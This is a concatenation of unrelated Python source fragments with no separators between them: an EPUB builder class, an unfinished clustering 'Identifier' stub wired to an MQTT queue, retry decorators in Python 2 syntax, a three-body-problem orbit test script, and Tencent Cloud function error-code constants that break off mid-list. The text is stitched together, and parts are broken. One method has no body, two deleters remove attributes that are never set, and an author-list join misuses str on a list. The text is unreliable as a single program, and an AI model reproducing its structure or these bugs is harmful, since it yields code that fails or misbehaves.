    describes how the person was involved in the work.

    You ONLY need this if an author's name is not of the form
    "Given-name Family-name", or if you want to specify a role other
    than author. Otherwise, you can just pass a string.

    The value of role should be a MARC relator, e.g., "aut" for author
    or "edt" for editor. See http://www.loc.gov/marc/relators/ for a
    full list.'''
    def __init__(self, name, fileas = None, role = 'aut'):
        '''Initialize the object. If the argument "fileas" is not given,
        "Last-name, First-name" is used for the file-as attribute. If
        the argument "role" is not given, "aut" is used for the role
        attribute.'''
        if not fileas:
            fileas = _normalize(name)
        self.tag = 'dc:creator'
        self.text = name
        self.attr = (('opf:file-as', fileas), ('opf:role', role))

class _OPFfile:
    '''Class for writing the OPF (Open Packaging Format) file for an
    epub file. The OPF file contains the metadata, a manifest of all
    component files in the epub, a "spine" which specifies the reading
    order and a guide which points to important components of the book
    such as the title page.'''

    _opf = (
      '<?xml version="1.0" encoding="UTF-8"?>\n'
      '<package version="2.0" xmlns="http://www.idpf.org/2007/opf" unique_identifier="uid_id">\n'
      '  <metadata xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:opf="http://www.idpf.org/2007/opf">\n'
      '{}'
      '  </metadata>\n'
      '  <manifest>\n'
      '{}'
      '  </manifest>\n'
      '  <spine toc="toc">\n'
      '{}'
      '  </spine>\n'
      '  <guide>\n'
      '{}'
      '  </guide>\n'
      '</package>\n'
    )
    def __init__(self):
        'Initialize.'
        self.meta = []
        self.filelist = []
    def write_xml(self):
        'Write the XML code for the OPF file.'
        metadata = ''
        for elem in self.meta:
            metadata += elem.write_xml()
        manif = ''
        spine = ''
        guide = ''
        for finfo in self.filelist:
            manif += finfo.manifest_entry()
            spine += finfo.spine_entry()
            guide += finfo.guide_entry()
        return self._opf.format(metadata, manif, spine, guide)

class EpubBuilder:
    '''Builds an epub2.0.1 file. Some of the attributes of this class
    (title, uid, lang) are marked as "mandatory" because they represent
    metadata that is required by the epub specification. If these
    attributes are left unset, default values will be used.'''

    _style_css = (
      'h1, h2, h3, h4, h5, h6 {\n'
      '  text-align: center;\n'
      '}\n'
      'p {\n'
      '  text-align: justify;\n'
      '  margin-top: 0.125em;\n'
      '  margin-bottom: 0em;\n'
      '  text-indent: 1.0em;\n'
      '}\n'
      '.getebook-tp {\n'
      '  margin-top: 8em;\n'
      '}\n'
      '.getebook-tp-authors {\n'
      '  font-size: 2em;\n'
      '  text-align: center;\n'
      '  margin-bottom: 1em;\n'
      '}\n'
      '.getebook-tp-title {\n'
      '  font-weight: bold;\n'
      '  font-size: 3em;\n'
      '  text-align: center;\n'
      '}\n'
      '.getebook-tp-sub {\n'
      '  text-align: center;\n'
      '  font-weight: normal;\n'
      '  font-size: 0.8em;\n'
      '  margin-top: 1em;\n'
      '}\n'
      '.getebook-false-h {\n'
      '  font-weight: bold;\n'
      '  font-size: 1.5em;\n'
      '}\n'
      '.getebook-small-h {\n'
      '  font-style: normal;\n'
      '  font-weight: normal;\n'
      '  font-size: 0.8em;\n'
      '}\n'
    )

    _container_xml = (
      '<?xml version="1.0"?>\n'
      '<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">\n'
      '  <rootfiles>\n'
      '    <rootfile full-path="package.opf" media-type="application/oebps-package+xml"/>\n'
      '  </rootfiles>\n'
      '</container>\n'
    )

    _html = (
      '<?xml version="1.0" encoding="utf-8"?>\n'
      '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">\n'
      '<html xmlns="http://www.w3.org/1999/xhtml">\n'
      '  <head>\n'
      '    <title>{}</title>\n'
      '    <meta http-equiv="content-type" content="application/xtml+xml; charset=utf-8" />\n'
      '    <link href="style.css" rel="stylesheet" type="text/css" />\n'
      '  </head>\n'
      '  <body>\n{}'
      '  </body>\n'
      '</html>\n'
    )

    _finalized = False

    def __init__(self, epub_file):
        '''Initialize the EpubBuilder instance. "epub_file" is the
        filename of the epub to be created.'''
        self.epub_f = zipfile.ZipFile(epub_file, 'w', zipfile.ZIP_DEFLATED)
        self.epub_f.writestr('mimetype', 'application/epub+zip')
        self.epub_f.writestr('META-INF/container.xml', self._container_xml)
        self.toc = EpubTOC()
        self.opf = _OPFfile()
        self.opf.filelist.append(_Fileinfo('toc.ncx', False))
        self.opf.filelist.append(_Fileinfo('style.css', False))
        self._authors = []
        self.opt_meta = {} # Optional metadata (other than authors)
        self.content = ''
        self.part_no = 0
        self.cont_filename = 'part%03d.html' % self.part_no

    def __enter__(self):
        'Return self for use in with ... as ... statement.'
        return self

    def __exit__(self, except_type, except_val, traceback):
        'Call finalize() and close the file.'
        try:
            self.finalize()
        finally:
            # Close again in case an exception happened in finalize()
            self.epub_f.close()
        return False

    @property
    def uid(self):
        '''Unique identifier of the ebook. (mandatory)

        If this property is left unset, a pseudo-random string will be
        generated which is long enough for collisions with existing
        ebooks to be extremely unlikely.'''
        try:
            return self._uid
        except AttributeError:
            import random
            from string import (ascii_letters, digits)
            alnum = ascii_letters + digits
            self.uid = ''.join([random.choice(alnum) for i in range(15)])
            return self._uid
    @uid.setter
    def uid(self, val):
        self._uid = _EpubMeta('dc:identifier', str(val), ('id', 'uid_id'))

    @property
    def title(self):
        '''Title of the ebook. (mandatory)

        If this property is left unset, it defaults to "Untitled".'''
        try:
            return self._title
        except AttributeError:
            self.title = 'Untitled'
            return self._title
    @title.setter
    def title(self, val):
        # If val is not a string, raise TypeError now rather than later.
        self._title = _EpubMeta('dc:title', '' + val)

    @property
    def lang(self):
        '''Language of the ebook. (mandatory)

        The language must be given as a lower-case two-letter code, optionally
        followed by a "-" and an upper-case two-letter country code.
        (e.g., "en", "en-US", "en-UK", "de", "de-DE", "de-AT")

        If this property is left unset, it defaults to "en".'''
        try:
            return self._lang
        except AttributeError:
            self.lang = 'en'
            return self._lang
    @lang.setter
    def lang(self, val):
        self._lang = _EpubLang(val)

    @property
    def author(self):
        '''Name of the author. (optional)
        
        If there are multiple authors, pass a list of strings.

        To control the file-as and role attribute, use author objects instead
        of strings; file-as is an alternate form of the name used for sorting.
        For a description of the role attribute, see the docstring of the
        author class.'''
        if len(self._authors) == 1:
            return self._authors[0]
        return tuple([aut for aut in self._authors])
    @author.setter
    def author(self, val):
        if isinstance(val, Author) or isinstance(val, str):
            authors = [val]
        else:
            authors = val
        for aut in authors:
            try:
                self._authors.append(Author('' + aut))
            except TypeError:
                # aut is not a string, so it should be an Author object
                self._authors.append(aut)
    @author.deleter
    def author(self):
        self._authors = []

    @property
    def date(self):
        '''Publication date. (optional)
        
        Must be given in "YYYY[-MM[-DD]]" format.'''
        try:
            return self.opt_meta['date']
        except KeyError:
            return None
    @date.setter
    def date(self, val):
        self.opt_meta['date'] = _EpubDate(val)
    @date.deleter
    def date(self):
        del self._date

    @property
    def rights(self):
        'Copyright/licensing information. (optional)'
        try:
            return self.opt_meta['rights']
        except KeyError:
            return None
    @rights.setter
    def rights(self, val):
        self.opt_meta['rights'] = _EpubMeta('dc:rights', '' + val)
    @rights.deleter
    def rights(self):
        del self._rights

    @property
    def publisher(self):
        'Publisher name. (optional)'
        try:
            return self.opt_meta['publisher']
        except KeyError:
            return None
    @publisher.setter
    def publisher(self, val):
        self.opt_meta['publisher'] = _EpubMeta('dc:publisher', '' + val)
    @publisher.deleter
    def publisher(self):
        del self._publisher
    
    @property
    def style_css(self):
        '''CSS stylesheet for the files that are generated by the EpubBuilder
        instance. Can be overwritten or extended, but not deleted.'''
        return self._style_css
    @style_css.setter
    def style_css(self, val):
        self._style_css = '' + val

    def titlepage(self, main_title = None, subtitle = None):
        '''Create a title page for the ebook. If no main_title is given,
        the title attribute of the EpubBuilder instance is used.'''
        tp = '<div class="getebook-tp">\n'
        if len(self._authors) >= 1:
            if len(self._authors) == 1:
                aut_str = str(self._authors[0])
            else:
                aut_str = ', '.join(str(self._authors[0:-1])) + ', and ' \
                                                       + str(self._authors[-1])
            tp += '<div class="getebook-tp-authors">%s</div>\n' % aut_str
        if not main_title:
            main_title = str(self.title)
        tp += '<div class="getebook-tp-title">%s' % main_title
        if subtitle:
            tp += '<div class="getebook-tp-sub">%s</div>' % subtitle
        tp += '</div>\n</div>\n'
        self.opf.filelist.insert(0, _Fileinfo('title.html',
          guide_title = 'Titlepage', guide_type = 'title-page'))
        self.epub_f.writestr('title.html', self._html.format(self.title, tp))

    def headingpage(self, heading, subtitle = None, toc_text = None):
        '''Create a page containing only a (large) heading, optionally
        with a smaller subtitle. If toc_text is not given, it defaults
        to the heading.'''
        self.new_part()
        tag = 'h%d' % min(6, self.toc.depth)
        self.content += '<div class="getebook-tp">'
        self.content += '<{} class="getebook-tp-title">{}'.format(tag, heading)
        if subtitle:
            self.content += '<div class="getebook-tp-sub">%s</div>' % subtitle
        self.content += '</%s>\n' % tag
        if not toc_text:
            toc_text = heading
        self.toc.new_entry(toc_text, self.cont_filename)
        self.new_part()

    def insert_file(self, name, in_spine = False, guide_title = None,
      guide_type = None, arcname = None):
        '''Include an external file into the ebook. By default, it will
        be added to the archive under its basename; the argument
        "arcname" can be used to specify a different name.'''
        if not arcname:
            arcname = os.path.basename(name)
        self.opf.filelist.append(_Fileinfo(arcname, in_spine, guide_title,
                                 guide_type))
        self.epub_f.write(name, arcname)

    def add_file(self, arcname, str_or_bytes, in_spine = False,
      guide_title = None, guide_type = None):
        '''Add the string or bytes instance str_or_bytes to the archive
        under the name arcname.'''
        self.opf.filelist.append(_Fileinfo(arcname, in_spine, guide_title,
                                 guide_type))
        self.epub_f.writestr(arcname, str_or_bytes)

    def false_heading(self, elem):
        '''Handle a "false heading", i.e., text that appears in heading
        tags in the source even though it is not a chapter heading.'''
        elem.attrs['class'] = 'getebook-false-h'
        elem.tag = 'p'
        self.handle_elem(elem)

    def _heading(self, elem):
        '''Write a heading.'''
        # Handle paragraph heading if we have one waiting (see the
        # par_heading method). We don\'t use _handle_par_h here because
        # we merge it with the subsequent proper heading.
        try:
            par_h = self.par_h
            del self.par_h
        except AttributeError:
            toc_text = elem.text
        else:
            # There is a waiting paragraph heading, we merge it with the
            # new heading.
            toc_text = par_h.text + '. ' + elem.text
            par_h.tag = 'div'
            par_h.attrs['class'] = 'getebook-small-h'
            elem.children.insert(0, par_h)
        # Set the class attribute value.
        elem.attrs['class'] = 'getebook-chapter-h'
        self.toc.new_entry(toc_text, self.cont_filename)
        # Add heading to the epub.
        tag = 'h%d' % min(self.toc.depth, 6)
        self.content += _make_starttag(tag, elem.attrs)
        for elem in elem.children:
            self.handle_elem(elem)
        self.content += '</%s>\n' % tag

    def par_heading(self, elem):
        '''Handle a "paragraph heading", i.e., a chaper heading or part
        of a chapter heading inside paragraph tags. If it is immediately
        followed by a heading, they will be merged into one.'''
        self.par_h = elem

    def _handle_par_h(self):
        'Check if there is a waiting paragraph heading and handle it.'
        try:
            self._heading(self.par_h)
        except AttributeError:
            pass

    def handle_elem(self, elem):
        'Handle html element as supplied by getebook.EbookParser.'
        try:
            tag = elem.tag
        except AttributeError:
            # elem should be a string
            is_string = True
            tag = None
        else:
            is_string = False
        if tag in getebook._headings:
            self._heading(elem)
        else:
            # Handle waiting par_h if necessary (see par_heading)
            try:
                self._heading(self.par_h)
            except AttributeError:
                pass
            if is_string:
                self.content += elem
            elif tag == 'br':
                self.content += '<br />\n'
            elif tag == 'img':
                self.content += self._handle_image(elem.attrs) + '\n'
            elif tag == 'a' or tag == 'noscript':
                # Ignore tag, just write child elements
                for child in elem.children:
                    self.handle_elem(child)
            else:
                self.content += _make_starttag(tag, elem.attrs)
                for child in elem.children:
                    self.handle_elem(child)
                self.content += '</%s>' % tag
                if tag == 'p':
                    self.content += '\n'

    def _handle_image(self, attrs):
        'Returns the alt text of an image tag.'
        try:
            return attrs['alt']
        except KeyError:
            return ''

    def new_part(self):
        '''Begin a new part of the epub. Write the current html document
        to the archive and begin a new one.'''
        # Handle waiting par_h (see par_heading)
        try:
            self._heading(self.par_h)
        except AttributeError:
            pass
        if self.content:
            html = self._html.format(self.title, self.content)
            self.epub_f.writestr(self.cont_filename, html)
            self.part_no += 1
        self.content = ''
        self.cont_filename = 'part%03d.html' % self.part_no
        self.opf.filelist.append(_Fileinfo(self.cont_filename))

    def finalize(self):
        'Complete and close the epub file.'
        # Handle waiting par_h (see par_heading)
        if self._finalized:
            # Avoid finalizing twice. Otherwise, calling finalize inside
            # a with-block would lead to an exception when __exit__
            # calls finalize again.
            return
        try:
            self._heading(self.par_h)
        except AttributeError:
            pass
        if self.content:
            html = self._html.format(self.title, self.content)
            self.epub_f.writestr(self.cont_filename, html)
        self.opf.meta = [self.uid, self.lang, self.title] + self._authors
        self.opf.meta += self.opt_meta.values()
        self.epub_f.writestr('package.opf', self.opf.write_xml())
        self.epub_f.writestr('toc.ncx',
          self.toc.write_xml(self.uid, self.title, self._authors))
        self.epub_f.writestr('style.css', self._style_css)
        self.epub_f.close()
        self._finalized = True

import numpy as np
import pandas as pd
from pandas import Series, DataFrame
from scipy.spatial import distance
import matplotlib.pyplot as plt

from sklearn.cluster import DBSCAN
from sklearn import metrics
from sklearn.datasets.samples_generator import make_blobs
from sklearn.preprocessing import StandardScaler
from sklearn import decomposition  # PCA
from sklearn.metrics import confusion_matrix

import json

import ml.Features as ft
from utils import Utils

class Identifier(object):

    def __init__(self):
        columns = ['mean_height', 'min_height', 'max_height', 'mean_width', 'min_width', 'max_width', 'time', 'girth','id']
        self.data = DataFrame(columns=columns)
        self.event = []
    @staticmethod
    def subscribe(ch, method, properties, body):
        """
        prints the body message. It's the default callback method
        :param ch: keep null
        :param method: keep null
        :param properties: keep null
        :param body: the message
        :return:
        """
        #first we get the JSON from body

        #we check if it's part of the walking event

        #if walking event is completed, we


if __name__ == '__main__':
    # we setup needed params
    MAX_HEIGHT = 203
    MAX_WIDTH = 142
    SPEED = 3
    SAMPLING_RATE = 8
    mq_host = '172.26.56.122'
    queue_name = 'door_data'
    # setting up MQTT subscriber
    Utils.sub(queue_name=queue_name,callback=subscribe,host=mq_host)
#!-*- coding:utf-8 -*-
import time


def retries(times=3, timeout=1):
    """对未捕获异常进行重试"""
    def decorator(func):
        def _wrapper(*args, **kw):
            att, retry = 0, 0
            while retry < times:
                retry += 1
                try:
                    return func(*args, **kw)
                except:
                    att += timeout
                    if retry < times:
                        time.sleep(att)
        return _wrapper
    return decorator


def empty_content_retries(times=3, timeout=2):
    """响应为空的进行重试"""
    def decorator(func):
        def _wrapper(*args, **kw):
            att, retry = 0, 0
            while retry < times:
                retry += 1
                ret = func(*args, **kw)
                if ret:
                    return ret
                att += timeout
                time.sleep(att)
        return _wrapper
    return decorator


def use_logging(level):
    """带参数的装饰器"""
    def decorator(func):
        print func.__name__
        def wrapper(*args, **kwargs):
            if level == "warn":
                print ("level:%s, %s is running" % (level, func.__name__))
            elif level == "info":
                print ("level:%s, %s is running" % (level, func.__name__))
            return func(*args, **kwargs)
        return wrapper
    return decorator

if __name__ == "__main__":
    @use_logging(level="warn")
    def foo(name='foo'):
        print("i am %s" % name)
    foo()
"""
********************************************************************
      Test file for implementation check of CR3BP library.
********************************************************************

Last update: 21/01/2022

Description
-----------
Contains a few sample orbit propagations to test the CR3BP library.

The orbits currently found in test file include:
    - L2 southern NRHO (9:2 NRHO of Lunar Gateway Station)
    - Distant Retrograde Orbit (DRO)
    - Butterfly Orbit
    - L2 Vertical Orbit
"""

# Testing CR3BP implementation

import matplotlib.pyplot as plt
import numpy as np
from astropy import units as u
from CR3BP import getChar_CR3BP, propagate, propagateSTM

from poliastro.bodies import Earth, Moon

# Earth-Moon system properties
k1 = Earth.k.to(u.km**3 / u.s**2).value
k2 = Moon.k.to(u.km**3 / u.s**2).value
r12 = 384747.99198  # Earth-Moon distance

# Compute CR3BP characterisitic values
mu, kstr, lstr, tstr, vstr, nstr = getChar_CR3BP(k1, k2, r12)


# -- Lunar Gateway Station Orbit - 9:2 NRHO

"""
The orbit is a Near-Rectilinear Halo Orbit (NRHO) around the L2 Lagragian
point of the Earth-Moon system. The orbit presented here is a southern
sub-family of the L2-NRHO. This orbit is 9:2 resonant orbit currenly set
as the candidate orbit for the Lunar Gateway Station (LOP-G). Its called
9:2 resonant since a spacecraft would complete 9 orbits in the NRHO for
every 2 lunar month (slightly different from lunar orbit period).

The exact orbital elements presented here are from the auther's simulations.
The orbit states were obtained starting form guess solutions given in various
references. A few are provided below:

Ref: White Paper: Gateway Destination Orbit Model: A Continuous 15 Year NRHO
    Reference Trajectory - NASA, 2019
Ref: Strategies for Low-Thrust Transfer Design Based on Direct Collocation
    Techniques - Park, Howell and Folta

The NRHO are subfamily of the Halo orbits. The 'Near-Rectilinear' term comes
from the very elongated state of the orbit considering a regular Halo. Halo
orbits occur in all three co-linear equilibrum points L1,L2 and L3. They occur
in a pair of variants (nothern and southern) due to symmetry of CR3BP.
"""

# 9:2 L2 souther NRHO orbit
r0 = np.array([[1.021881345465263, 0, -0.182000000000000]])
v0 = np.array([0, -0.102950816739606, 0])
tf = 1.509263667286943

# number of points to plot
Nplt = 300
tofs = np.linspace(0, tf, Nplt)

# propagate the base trajectory
rf, vf = propagate(mu, r0, v0, tofs, rtol=1e-11)

# ploting orbit
rf = np.array(rf)

fig = plt.figure()
ax = plt.axes(projection="3d")
ax.set_box_aspect(
    (np.ptp(rf[:, 0]), np.ptp(rf[:, 1]), np.ptp(rf[:, 2]))
)  # aspect ratio is 1:1:1 in data space
# ploting the moon
ax.plot3D(1 - mu, 0, 0, "ok")
ax.set_title("L2 Southern NRHO")
ax.set_xlabel("x-axis [nd]")
ax.set_ylabel("y-axis [nd]")
ax.set_zlabel("z-axis [nd]")

ax.plot3D(rf[:, 0], rf[:, 1], rf[:, 2], "b")
plt.show()


"""
All other orbits in this section are computed from guess solutions available
in Grebow's Master and PhD thesis. He lists a quite detailed set of methods
to compute most of the major periodic orbits I have presented here. All of
them use differntial correction methods which are not yet implemented in this
library.

Ref: GENERATING PERIODIC ORBITS IN THE CIRCULAR RESTRICTED THREEBODY PROBLEM
    WITH APPLICATIONS TO LUNAR SOUTH POLE COVERAGE
    - D.Grebow 2006 (Master thesis)
Ref: TRAJECTORY DESIGN IN THE EARTH-MOON SYSTEM
    AND LUNAR SOUTH POLE COVERAGE
    - D.Grebow 2010 (PhD desertation)
"""


# -- DRO orbit

# DRO orbit states

r0 = np.array([0.783390492345344, 0, 0])
v0 = np.array([0, 0.548464515316651, 0])
tf = 3.63052604667440

# number of points to plot
Nplt = 300
tofs = np.linspace(0, tf, Nplt)

# propagate the base trajectory
rf, vf = propagate(mu, r0, v0, tofs, rtol=1e-11)


# ploting orbit
rf = np.array(rf)

fig = plt.figure()
ax = plt.axes(projection="3d")
ax.set_box_aspect(
    (np.ptp(rf[:, 0]), np.ptp(rf[:, 1]), np.ptp(rf[:, 2]))
)  # aspect ratio is 1:1:1 in data space
# ploting the moon
ax.plot3D(1 - mu, 0, 0, "ok")
ax.set_title("Distant Restrograde orbit (DRO)")
ax.set_xlabel("x-axis [nd]")
ax.set_ylabel("y-axis [nd]")
ax.set_zlabel("z-axis [nd]")

ax.plot3D(rf[:, 0], rf[:, 1], rf[:, 2], "m")
plt.show()


# -- Butterfly orbit

# Butterfly orbit states

r0 = np.array([1.03599510774957, 0, 0.173944812752286])
v0 = np.array([0, -0.0798042160573269, 0])
tf = 2.78676904546834

# number of points to plot
Nplt = 300
tofs = np.linspace(0, tf, Nplt)

# propagate the base trajectory
rf, vf = propagate(mu, r0, v0, tofs, rtol=1e-11)

# ploting orbit
rf = np.array(rf)

fig = plt.figure()
ax = plt.axes(projection="3d")
ax.set_box_aspect(
    (np.ptp(rf[:, 0]), np.ptp(rf[:, 1]), np.ptp(rf[:, 2]))
)  # aspect ratio is 1:1:1 in data space
# ploting the moon
ax.plot3D(1 - mu, 0, 0, "ok")
ax.set_title("Butterfly orbit")
ax.set_xlabel("x-axis [nd]")
ax.set_ylabel("y-axis [nd]")
ax.set_zlabel("z-axis [nd]")

ax.plot3D(rf[:, 0], rf[:, 1], rf[:, 2], "r")
plt.show()


# -- Vertical orbit

# Vertical orbit states

r0 = np.array([0.504689989562366, 0, 0.836429774762193])
v0 = np.array([0, 0.552722840538063, 0])
tf = 6.18448756121754

# number of points to plot
Nplt = 300
tofs = np.linspace(0, tf, Nplt)

# propagate the base trajectory
rf, vf = propagate(mu, r0, v0, tofs, rtol=1e-11)

# ploting orbit
rf = np.array(rf)

fig = plt.figure()
ax = plt.axes(projection="3d")
ax.set_box_aspect(
    (np.ptp(rf[:, 0]), np.ptp(rf[:, 1]), np.ptp(rf[:, 2]))
)  # aspect ratio is 1:1:1 in data space
# ploting the moon
ax.plot3D(1 - mu, 0, 0, "ok")
ax.set_title("L2 Vertical orbit")
ax.set_xlabel("x-axis [nd]")
ax.set_ylabel("y-axis [nd]")
ax.set_zlabel("z-axis [nd]")

ax.plot3D(rf[:, 0], rf[:, 1], rf[:, 2], "g")
plt.show()


# -- Propage STM

# propagate base trajectory with state-transition-matrix
STM0 = np.eye(6)
rf, vf, STM = propagateSTM(mu, r0, v0, STM0, tofs, rtol=1e-11)

# STM is a matrix of partial derivatives which are used in Newton-Raphson
# methods for trajectory design

# -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


# 操作失败。
FAILEDOPERATION = 'FailedOperation'

# API网关触发器创建失败。
FAILEDOPERATION_APIGATEWAY = 'FailedOperation.ApiGateway'

# 创建触发器失败。
FAILEDOPERATION_APIGW = 'FailedOperation.Apigw'

# 获取Apm InstanceId失败。
FAILEDOPERATION_APMCONFIGINSTANCEID = 'FailedOperation.ApmConfigInstanceId'

# 当前异步事件状态不支持此操作，请稍后重试。
FAILEDOPERATION_ASYNCEVENTSTATUS = 'FailedOperation.AsyncEventStatus'

# 复制函数失败。
FAILEDOPERATION_COPYFAILED = 'FailedOperation.CopyFailed'

# 不支持复制到该地域。
FAILEDOPERATION_COPYFUNCTION = 'FailedOperation.CopyFunction'

# 操作COS资源失败。
FAILEDOPERATION_COS = 'FailedOperation.Cos'

# 创建别名失败。
FAILEDOPERATION_CREATEALIAS = 'FailedOperation.CreateAlias'

# 操作失败。
FAILEDOPERATION_CREATEFUNCTION = 'FailedOperation.CreateFunction'

# 创建命名空间失败。
FAILEDOPERATION_CREATENAMESPACE = 'FailedOperation.CreateNamespace'

# 当前函数状态无法进行此操作。
FAILEDOPERATION_CREATETRIGGER = 'FailedOperation.CreateTrigger'

# 当前调试状态无法执行此操作。
FAILEDOPERATION_DEBUGMODESTATUS = 'FailedOperation.DebugModeStatus'

# 调试状态下无法更新执行超时时间。
FAILEDOPERATION_DEBUGMODEUPDATETIMEOUTFAIL = 'FailedOperation.DebugModeUpdateTimeOutFail'

# 删除别名失败。
FAILEDOPERATION_DELETEALIAS = 'FailedOperation.DeleteAlias'

# 当前函数状态无法进行此操作，请在函数状态正常时重试。
FAILEDOPERATION_DELETEFUNCTION = 'FailedOperation.DeleteFunction'

# 删除layer版本失败。
FAILEDOPERATION_DELETELAYERVERSION = 'FailedOperation.DeleteLayerVersion'

# 无法删除默认Namespace。
FAILEDOPERATION_DELETENAMESPACE = 'FailedOperation.DeleteNamespace'

# 删除触发器失败。
FAILEDOPERATION_DELETETRIGGER = 'FailedOperation.DeleteTrigger'

# 当前函数状态无法更新代码，请在状态为正常时更新。
FAILEDOPERATION_FUNCTIONNAMESTATUSERROR = 'FailedOperation.FunctionNameStatusError'

# 函数在部署中,无法做此操作。
FAILEDOPERATION_FUNCTIONSTATUSERROR = 'FailedOperation.FunctionStatusError'

# 当前函数版本状态无法进行此操作，请在版本状态为正常时重试。
FAILEDOPERATION_FUNCTIONVERSIONSTATUSNOTACTIVE = 'FailedOperation.FunctionVersionStatusNotActive'

# 获取别名信息失败。
FAILEDOPERATION_GETALIAS = 'FailedOperation.GetAlias'

# 获取函数代码地址失败。
FAILEDOPERATION_GETFUNCTIONADDRESS = 'FailedOperation.GetFunctionAddress'

# 当前账号或命名空间处于欠费状态，请在可用时重试。
FAILEDOPERATION_INSUFFICIENTBALANCE = 'FailedOperation.InsufficientBalance'

# 调用函数失败。
FAILEDOPERATION_INVOKEFUNCTION = 'FailedOperation.InvokeFunction'

# 命名空间已存在，请勿重复创建。
FAILEDOPERATION_NAMESPACE = 'FailedOperation.Namespace'

# 服务开通失败。
FAILEDOPERATION_OPENSERVICE = 'FailedOperation.OpenService'

# 操作冲突。
FAILEDOPERATION_OPERATIONCONFLICT = 'FailedOperation.OperationConflict'

# 创建定时预置任务失败。
FAILEDOPERATION_PROVISIONCREATETIMER = 'FailedOperation.ProvisionCreateTimer'

# 删除定时预置任务失败。
FAILEDOPERATION_PROVISIONDELETETIMER = 'FailedOperation.ProvisionDeleteTimer'

# 当前函数版本已有预置任务处于进行中，请稍后重试。
FAILEDOPERATION_PROVISIONEDINPROGRESS = 'FailedOperation.ProvisionedInProgress'

# 发布layer版本失败。
FAILEDOPERATION_PUBLISHLAYERVERSION = 'FailedOperation.PublishLayerVersion'

# 当前函数状态无法发布版本，请在状态为正常时发布。
FAILEDOPERATION_PUBLISHVERSION = 'FailedOperation.PublishVersion'

# 角色不存在。
FAILEDOPERATION_QCSROLENOTFOUND = 'FailedOperation.QcsRoleNotFound'

# 当前函数已有保留并发设置任务处于进行中，请稍后重试。
FAILEDOPERATION_RESERVEDINPROGRESS = 'FailedOperation.ReservedInProgress'

# Topic不存在。
FAILEDOPERATION_TOPICNOTEXIST = 'FailedOperation.TopicNotExist'

# 用户并发内存配额设置任务处于进行中，请稍后重试。
FAILEDOPERATION_TOTALCONCURRENCYMEMORYINPROGRESS = 'FailedOperation.TotalConcurrencyMemoryInProgress'

# 指定的服务未开通，可以提交工单申请开通服务。
FAILEDOPERATION_UNOPENEDSERVICE = 'FailedOperation.UnOpenedService'

# 更新别名失败。
FAILEDOPERATION_UPDATEALIAS = 'FailedOperation.UpdateAlias'

# 当前函数状态无法更新代码，请在状态为正常时更新。
FAILEDOPERATION_UPDATEFUNCTIONCODE = 'FailedOperation.UpdateFunctionCode'

# UpdateFunctionConfiguration操作失败。
FAILEDOPERATION_UPDATEFUNCTIONCONFIGURATION = 'FailedOperation.UpdateFunctionConfiguration'

# 内部错误。
INTERNALERROR = 'InternalError'

# 创建apigw触发器内部错误。
INTERNALERROR_APIGATEWAY = 'InternalError.ApiGateway'

# ckafka接口失败。
INTERNALERROR_CKAFKA = 'InternalError.Ckafka'

# 删除cmq触发器失败。
INTERNALERROR_CMQ = 'InternalError.Cmq'

# 更新触发器失败。
INTERNALERROR_COS = 'InternalError.Cos'

# ES错误。
INTERNALERROR_ES = 'InternalError.ES'

# 内部服务异常。
INTERNALERROR_EXCEPTION = 'InternalError.Exception'

# 内部服务错误。
INTERNALERROR_GETROLEERROR = 'InternalError.GetRoleError'

# 内部系统错误。
INTERNALERROR_SYSTEM = 'InternalError.System'

# 内部服务错误。
INTERNALERROR_SYSTEMERROR = 'InternalError.SystemError'

# FunctionName取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETER_FUNCTIONNAME = 'InvalidParameter.FunctionName'

# 请求参数不合法。
INVALIDPARAMETER_PAYLOAD = 'InvalidParameter.Payload'

# RoutingConfig参数传入错误。
INVALIDPARAMETER_ROUTINGCONFIG = 'InvalidParameter.RoutingConfig'

# 参数取值错误。
INVALIDPARAMETERVALUE = 'InvalidParameterValue'

# Action取值与规范不符，请修正后再试。可参考：https://tencentcs.com/5jXKFnBW。
INVALIDPARAMETERVALUE_ACTION = 'InvalidParameterValue.Action'

# AdditionalVersionWeights参数传入错误。
INVALIDPARAMETERVALUE_ADDITIONALVERSIONWEIGHTS = 'InvalidParameterValue.AdditionalVersionWeights'

# 不支持删除默认别名，请修正后重试。
INVALIDPARAMETERVALUE_ALIAS = 'InvalidParameterValue.Alias'

# ApiGateway参数错误。
INVALIDPARAMETERVALUE_APIGATEWAY = 'InvalidParameterValue.ApiGateway'

# ApmConfig参数传入错误。
INVALIDPARAMETERVALUE_APMCONFIG = 'InvalidParameterValue.ApmConfig'

# ApmConfigInstanceId参数传入错误。
INVALIDPARAMETERVALUE_APMCONFIGINSTANCEID = 'InvalidParameterValue.ApmConfigInstanceId'

# ApmConfigRegion参数传入错误。
INVALIDPARAMETERVALUE_APMCONFIGREGION = 'InvalidParameterValue.ApmConfigRegion'

# Args 参数值有误。
INVALIDPARAMETERVALUE_ARGS = 'InvalidParameterValue.Args'

# 函数异步重试配置参数无效。
INVALIDPARAMETERVALUE_ASYNCTRIGGERCONFIG = 'InvalidParameterValue.AsyncTriggerConfig'

# Cdn传入错误。
INVALIDPARAMETERVALUE_CDN = 'InvalidParameterValue.Cdn'

# cfs配置项重复。
INVALIDPARAMETERVALUE_CFSPARAMETERDUPLICATE = 'InvalidParameterValue.CfsParameterDuplicate'

# cfs配置项取值与规范不符。
INVALIDPARAMETERVALUE_CFSPARAMETERERROR = 'InvalidParameterValue.CfsParameterError'

# cfs参数格式与规范不符。
INVALIDPARAMETERVALUE_CFSSTRUCTIONERROR = 'InvalidParameterValue.CfsStructionError'

# Ckafka传入错误。
INVALIDPARAMETERVALUE_CKAFKA = 'InvalidParameterValue.Ckafka'

# 运行函数时的参数传入有误。
INVALIDPARAMETERVALUE_CLIENTCONTEXT = 'InvalidParameterValue.ClientContext'

# Cls传入错误。
